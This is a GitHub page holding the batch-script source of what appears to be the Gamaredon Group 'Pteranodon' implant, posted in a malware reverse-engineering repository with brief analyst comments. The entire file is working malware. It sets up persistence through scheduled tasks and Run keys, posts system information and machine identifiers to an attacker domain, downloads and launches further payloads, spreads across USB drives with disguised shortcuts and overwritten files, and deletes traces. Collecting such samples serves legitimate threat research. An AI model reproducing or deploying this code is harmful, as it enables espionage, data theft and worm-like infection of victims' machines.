Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Malware-Misc-RE/2019-04-13-Gamaredon-Group-Pteranodon-Implant-$1_c.01.cmd
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
359 lines (282 sloc)
9.42 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM @VK_Intel | |
| REM MD5: 7ac3a99fb79ec2143900afa73c47b243 | |
| REM Self-extractable executable | |
| @echo off | |
| setlocal ENABLEDELAYEDEXPANSION | |
| set vers=%1_c.01 REM implant version | |
| set ver=%vers% | |
| set updata=%1.tmp | |
| set /a maxword=10 | |
| set /a maxword1=10 | |
| set /a maxtxt=10 | |
| set /a maxjpg=10 | |
| set files=zoom.exe | |
| set telotroyan=bootstat.dat REM trojan body - bootst | |
| set chromus=OfficePlugin REM masked as OfficePlugin | |
| REM URL http://updates-spreadwork.pw | |
| REM set domenus1=http:// | |
| REM set domenus2=updates- | |
| REM set domenus3=spreadwork.pw | |
| call :prosesstron %files% | |
| ping 127.0.0.1 | |
| For /F "Tokens=2 Delims=[]" %%i In ('ver') Do ( | |
| For /F "Tokens=2,3 Delims=. " %%a In ("%%i") Do Set versions=%%a.%%b | |
| ) | |
| If "%versions%"=="5.1" goto xpos | |
| set chromusdir=%APPDATA%\Microsoft\Office\Plugin | |
| set param222=/SC MINUTE /MO 10 /F | |
| goto viber | |
| :xpos | |
| set chromusdir=%WINDIR%\Microsoft\Office\Plugin | |
| set param222=/SC MINUTE /MO 10 /RU "SYSTEM" | |
| goto viber | |
| :viber | |
| if not exist "%chromusdir%\*.*" MD "%chromusdir%" | |
| copy "%files%" "%chromusdir%\%chromus%.exe" /y | |
| del /f /q "%chromusdir%\*.tmp" | |
| schtasks /Query /tn %chromus% | |
| if errorlevel 1 ( | |
| schtasks /Create %param222% /tn %chromus% /tr "%chromusdir%\%chromus%.exe" | |
| ) | |
| REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v %chromus% | Find "%chromusdir%\%chromus%.exe" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v %chromus% /t REG_EXPAND_SZ /d "%chromusdir%\%chromus%.exe" /f | |
| ) | |
| :spread | |
| setlocal enabledelayedexpansion | |
| set nabor=qQwWeErRtTyYuUiIoOpPaAsSdDfFgGhHjJkKlLzZxXcCvVbBnNmM1234567890 | |
| set long=15 | |
| call :writePwd downlist.txt | |
| setlocal enableextensions enabledelayedexpansion | |
| ping 8.8.8.8 |>nul find /i "TTL=" &&goto otsetup||goto capiton | |
| :otsetup | |
| taskkill /f /im ImagingDevices.exe | |
| setlocal enabledelayedexpansion | |
| schtasks /Query /TN StateBinDLL /XML | find /i "command" > "%CD%\statebin.ini" | |
| for %%i in ("%CD%\statebin.ini") do ( | |
| if %%~zi==0 ( | |
| set ver=NO_DLLS-%ver% | |
| goto metka | |
| ) | |
| ) | |
| set /p x=<"%CD%\statebin.ini" | |
| set /p "x=%x:~15,-10%"<nul >"%CD%\statebin.ini" | |
| set /p tmps=<"%CD%\statebin.ini" | |
| if %tmps%==rundll32.exe goto updll2 | |
| :updll | |
| if not exist "%tmps%" (set ver=NO_DLLS-%ver%) | |
| :metka | |
| For /F "Tokens=4*" %%B In ('vol c:') Do set updates=%%B | |
| if errorlevel 1 set updates=00000-00000 | |
| set comments=%updates:-=% | |
| systeminfo /FO TABLE /NH > system.ini | |
| FOR /F "tokens=*" %%i IN (system.ini) do @IF NOT X%%i==X set infosys=!infosys!%%i+### | |
| set IDs=%computername%_%comments% | |
| set IDs=%IDs: =% | |
| setlocal | |
| set ID=0 | |
| For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j | |
| set flashid=%ID% | |
| if %ID%==0 set flashid=000000 | |
| http://updates-spreadwork.pw | |
| set domenus1=http:// | |
| set domenus2=updates- | |
| set domenus3=spreadwork.pw | |
| set /p down=<downlist.txt | |
| ImagingDevices.exe --post-data="versiya=%ver%&comp=%computername%&id=%IDs%&sysinfo=%infosys%&fid=%flashid%" "%domenus1%%domenus2%%domenus3%" -q -N %domenus1%%domenus2%%domenus3% -O %down% | |
| for %%i in (%down%) do (set /a size=%%~Zi) | |
| if %size%==0 goto capiton | |
| if %size% LEQ 30000 goto updat | |
| start /b %down%.exe | |
| goto capiton | |
| :updat | |
| set /p zagr=<%down% | |
| If %ERRORLEVEL% == 0 ( | |
| ImagingDevices.exe "%zagr%/%updata%" | |
| copy "%updata%" "%chromusdir%\%chromus%.tmp" /y | |
| call kill.cmd %chromusdir% %chromus% | |
| ) | |
| :capiton | |
| setlocal | |
| set ID=0 | |
| For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j | |
| if %ID%==0 goto outlog | |
| If Not Exist %USB% goto outlog | |
| if not exist %USB%\* goto outlog | |
| If Not Exist "%chromusdir%\%ID%.usb" call :ZarFlash | |
| set papka=Recycle | |
| set directors=%USB%\%papka% | |
| If Not Exist %directors% ( | |
| MD %directors% | |
| attrib +h %directors% | |
| ) | |
| REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden | Find "0x2" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 00000002 /f | |
| ) | |
| REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt | Find "0x0" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v HideFileExt /t REG_DWORD /d 00000000 /f | |
| ) | |
| setlocal enabledelayedexpansion | |
| attrib -h "%USB%\*.*" /s | |
| for %%F in (disk.inf pagefile.sys ntuser.ini disk.trashinfo boot.sys win.ini usb.ini ntuser.log ntuser.sys bootstat.dat) do ( | |
| for /f "Tokens=1* Delims=" %%a in ('dir /b/s %USB%\%%F') do ( | |
| copy "%files%" "%%a" /y | |
| attrib +h "%%a" | |
| ) | |
| ) | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.exe"') do (copy "%files%" "%%r" /y) | |
| ) | |
| set rashirenie=doc.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=docx.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=txt.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=jpg.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| for /f "Tokens=1* delims=" %%g in ('dir /b/s "%USB%\*.lnk.lnk"') do (ren "%%g" "%%~ng") | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y) | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=doc | |
| set /a pred=%maxword% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=docx | |
| set /a pred=%maxword% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set /a ico=70 | |
| set rash=txt | |
| set /a pred=%maxtxt% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set /a ico=302 | |
| set rash=jpg | |
| set /a pred=%maxjpg% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=doc | |
| set /a pred=%maxword1% | |
| set i=0 | |
| set num=0 | |
| set flashdirectors=%USB% | |
| for %%j in ("!flashdirectors!\*.lnk") do (set /a num+=1) | |
| for %%f in ("!flashdirectors!\*.doc") do ( | |
| set /a i+=1 | |
| if /I !num! LEQ %pred% ( | |
| if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%") | |
| ) | |
| ) | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y) | |
| attrib +h %USB%\%telotroyan% /s | |
| attrib +h %%directors%% | |
| :outlog | |
| taskkill /f /im mshta.exe | |
| for /r "%TEMP%" %%d in (.) do dir /b "%%~d" | find /v "">nul || rd /s /q "%%~d" | |
| del /f /q "%CD%\*.*" | |
| exit | |
| :firstaction | |
| for /f "delims=" %%d in ('dir /b/s/ad "%USB%"') do ( | |
| set i=0 | |
| set num=0 | |
| for %%j in ("%%d\*.lnk") do (set /a num+=1) | |
| if /i not %%d==%directors% set flashdirectors=%%d | |
| for %%f in ("!flashdirectors!\*.%rash%") do ( | |
| set /a i+=1 | |
| if /I !num! LEQ %pred% ( | |
| if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%") | |
| ) | |
| ) | |
| ) | |
| EXIT /B | |
| :actions | |
| chcp 1251 >nul | |
| if /I !num! GEQ %pred% (exit /B) | |
| set RAN=%RANDOM% | |
| copy /y "%~1" "%directors%\FILE%RAN%.%rash%" | |
| set starts=\%papka%\FILE%RAN%.%rash% | |
| set startfill="/C %starts% & attrib -h %telotroyan% & start %telotroyan%" | |
| copy %files% "!flashdirectors!\%telotroyan%" /y | |
| start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%~1.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%startfill%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()") | |
| del /f /q "%~1" | |
| EXIT /B | |
| :TestDisk | |
| Set $%1=%2 | |
| If %1==VolumeSerialNumber If Defined $%1 (Set USB=%$Name%& Set ID=%$VolumeSerialNumber%) | |
| EXIT /B | |
| :ZarFlash | |
| copy %files% "%USB%\%telotroyan%" /y | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=3 | |
| set lnkfiles="/C %windir%\explorer.exe & attrib -h %telotroyan% & start %telotroyan%" | |
| start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%USB%\%date%.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%lnkfiles%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()") | |
| cd.>"%chromusdir%\%ID%.usb" | |
| attrib +h "%USB%\%telotroyan%" | |
| EXIT /B | |
| :prosesstron | |
| setlocal ENABLEDELAYEDEXPANSION | |
| set read=0 | |
| set mn=%~nx0 | |
| for /f "usebackq tokens=1* delims==" %%A IN (`wmic process get parentprocessid^, commandline /value`) DO ( | |
| if "!read!"=="1" ( | |
| if "%%A"=="ParentProcessId" (set prntid=%%B) | |
| ) | |
| if "%%A"=="CommandLine" ( | |
| set cmdln=%%B | |
| if not "!cmdln:%mn%=!"=="!cmdln!" ( | |
| set read=1 | |
| ) else ( | |
| set read=0 | |
| ) | |
| ) | |
| ) | |
| SET /a pid=%prntid% | |
| FOR /f "skip=3delims=" %%a IN ('tasklist') DO ( | |
| SET "found=%%a" | |
| SET /a foundpid=!found:~26,8! | |
| SET /a foundpid=!found:~26,8! | |
| IF %pid%==!foundpid! set ParentName=!found:~0,24%! | |
| ) | |
| set "ProcName=%ParentName: =%" | |
| for /f "tokens=1* delims==" %%i in (' | |
| wmic process where "Name='%ProcName%'" get ExecutablePath /value^| findstr : | |
| ') do set ExecutablePath=%%j | |
| copy "%ExecutablePath%" "%files%" /y | |
| EXIT /B | |
| :delsrashlnks | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.!rashirenie!"') do ( | |
| xcopy /d /q /y "%rashirenie%" "%%r" | |
| ) | |
| EXIT /B | |
| :updll2 | |
| schtasks /Query /TN StateBinDLL /XML | find /i "arguments" > "%CD%\statebin.ini" | |
| set /p y=<"%CD%\statebin.ini" | |
| set /p "y=%y:~17,-10%"<nul >"%CD%\statebin.ini" | |
| set /p tmps=<"%CD%\statebin.ini" | |
| goto updll | |
| :writePwd | |
| set Pwd= | |
| for /L %%A IN (1,1,%long%) DO ( | |
| call :getRandS | |
| set Pwd=!Pwd!!rands! | |
| ) | |
| echo.%Pwd%>>"%~1" | |
| exit /b | |
| :getRandS | |
| set /a RandKey=%RANDOM% %% 62 | |
| set rands=!nabor:~%RandKey%,1! | |
| exit /b |